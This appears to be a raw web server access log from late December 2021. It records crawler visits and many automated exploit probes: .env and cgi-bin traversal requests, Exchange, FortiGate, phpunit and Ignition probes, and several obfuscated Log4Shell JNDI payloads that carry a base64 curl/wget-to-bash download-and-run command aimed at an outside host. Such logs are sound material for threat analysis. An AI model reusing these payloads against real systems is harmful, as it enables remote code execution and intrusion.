195.54.160.149 - - [28/Dec/2021:01:05:23 +0100] "-" 408 - "-" "-" 51.79.101.236 - - [28/Dec/2021:01:38:38 +0100] "GET /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 51.79.101.236 - - [28/Dec/2021:01:38:38 +0100] "POST / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 195.54.160.149 - - [28/Dec/2021:01:48:38 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 34.212.98.218 - - [28/Dec/2021:01:49:43 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 34.222.24.13 - - [28/Dec/2021:01:50:17 +0100] "GET /favicon.ico HTTP/1.1" 301 302 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 34.222.24.13 - - [28/Dec/2021:01:50:21 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 172.105.189.111 - - [28/Dec/2021:02:20:23 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 195.54.160.149 - - [28/Dec/2021:02:47:15 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.149 - - [28/Dec/2021:03:03:31 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 45.134.144.108 - - [28/Dec/2021:03:35:28 +0100] "GET ///remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1" 301 325 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64" 195.54.160.149 - - [28/Dec/2021:04:01:08 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 71.6.232.7 - - [28/Dec/2021:04:06:32 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" 40.77.167.42 - - [28/Dec/2021:04:16:30 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 131.220.6.152 - - [28/Dec/2021:04:51:10 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 195.54.160.149 - - [28/Dec/2021:05:10:05 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==} HTTP/1.1" 301 435 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==}" 154.89.5.73 - - [28/Dec/2021:05:17:24 +0100] "GET / HTTP/1.0" 301 383 "-" "-" 167.248.133.41 - - [28/Dec/2021:06:46:17 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 167.248.133.41 - - [28/Dec/2021:06:46:17 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 208.100.26.249 - - [28/Dec/2021:07:11:36 +0100] "GET / HTTP/1.1" 301 297 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MALGJS; rv:11.0) like Gecko" 167.94.138.114 - - [28/Dec/2021:08:04:33 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 167.94.138.114 - - [28/Dec/2021:08:04:33 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 35.195.93.98 - - [28/Dec/2021:08:09:00 +0100] "GET / HTTP/1.1" 301 301 "-" "python-requests/2.26.0" 137.184.216.158 - - [28/Dec/2021:09:22:33 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Redmi 4A Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.116 Mobile Safari/537.36" 203.229.155.49 - - [28/Dec/2021:09:29:25 +0100] "HEAD / HTTP/1.1" 301 - "https://www.bing.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" 192.241.208.227 - - [28/Dec/2021:09:32:49 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.212.79 - - [28/Dec/2021:09:41:25 +0100] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 301 335 "-" "Mozilla/5.0 zgrab/0.x" 69.171.249.15 - - [28/Dec/2021:11:06:24 +0100] "GET / HTTP/1.1" 301 296 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 192.241.214.35 - - [28/Dec/2021:12:52:05 +0100] "GET /actuator/health HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 35.199.24.178 - - [28/Dec/2021:13:18:43 +0100] "GET /?q=%salvidor%&va=b&t=hc&ia=web HTTP/1.0" 301 429 "-" "-" 184.105.247.194 - - [28/Dec/2021:13:27:13 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 66.249.77.32 - - [28/Dec/2021:13:43:41 +0100] "GET /robots.txt HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.77.32 - - [28/Dec/2021:13:43:42 +0100] "GET / HTTP/1.1" 301 297 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 40.77.167.42 - - [28/Dec/2021:13:47:55 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 51.158.108.61 - - [28/Dec/2021:14:00:35 +0100] "GET / HTTP/1.1" 301 386 "-" "-" 195.54.160.149 - - [28/Dec/2021:16:02:05 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.149 - - [28/Dec/2021:16:10:44 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 104.206.128.30 - - [28/Dec/2021:16:29:12 +0100] "GET / HTTP/1.1" 400 374 "-" "https://gdnplus.com:Gather Analyze Provide." 163.172.180.25 - - [28/Dec/2021:17:33:27 +0100] "GET / HTTP/1.1" 301 393 "-" "-" 47.243.24.192 - - [28/Dec/2021:18:16:32 +0100] "GET / HTTP/1.0" 301 388 "-" "-" 47.243.24.192 - - [28/Dec/2021:18:18:32 +0100] "GET /text4041640711911 HTTP/1.1" 301 400 "-" "Mozilla/5.0 (compatible;)" 47.243.24.192 - - [28/Dec/2021:18:18:33 +0100] "GET /evox/about HTTP/1.1" 301 393 "-" "Mozilla/5.0 (compatible;)" 47.243.24.192 - - [28/Dec/2021:18:18:34 +0100] "GET / HTTP/1.0" 301 388 "-" "-" 47.243.24.192 - - [28/Dec/2021:18:18:35 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 47.243.24.192 - - [28/Dec/2021:18:18:36 +0100] "GET /HNAP1 HTTP/1.1" 301 388 "-" "Mozilla/5.0 (compatible;)" 47.243.24.192 - - [28/Dec/2021:18:18:36 +0100] "POST /sdk HTTP/1.1" 301 386 "-" "Mozilla/5.0 (compatible;)" 47.243.24.192 - - [28/Dec/2021:18:19:14 +0100] "GET / HTTP/1.1" 301 301 "-" "-" 47.243.24.192 - - [28/Dec/2021:18:19:40 +0100] "GET / HTTP/1.1" 301 301 "-" "curl/7.75.0" 47.243.24.192 - - [28/Dec/2021:18:20:06 +0100] "GET /favicon.ico HTTP/1.1" 301 309 "-" "curl/7.75.0" 192.241.209.81 - - [28/Dec/2021:18:24:10 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x" 128.14.209.170 - - [28/Dec/2021:20:23:29 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 51.158.98.24 - - [28/Dec/2021:20:28:20 +0100] "GET / HTTP/1.1" 301 394 "-" "-" 195.54.160.149 - - [28/Dec/2021:20:59:09 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 301 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 185.180.143.138 - - [28/Dec/2021:21:41:42 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 195.54.160.149 - - [28/Dec/2021:21:49:20 +0100] "GET /_ignition/execute-solution HTTP/1.1" 301 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.149 - - [28/Dec/2021:22:15:25 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.149 - - [28/Dec/2021:23:24:00 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.149 - - [28/Dec/2021:23:41:09 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.241.204.237 - - [29/Dec/2021:00:22:45 +0100] "GET /ReportServer HTTP/1.1" 301 307 "-" "Mozilla/5.0 zgrab/0.x" 192.241.209.28 - - [29/Dec/2021:00:26:35 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.212.44 - - [29/Dec/2021:00:27:57 +0100] "GET /owa/auth/logon.aspx HTTP/1.1" 301 314 "-" "Mozilla/5.0 zgrab/0.x" 192.241.195.22 - - [29/Dec/2021:00:29:52 +0100] "GET /owa/auth/x.js HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 192.241.204.6 - - [29/Dec/2021:00:43:40 +0100] "GET /login HTTP/1.1" 301 305 "-" "Mozilla/5.0 zgrab/0.x" 195.54.160.149 - - [29/Dec/2021:00:45:23 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"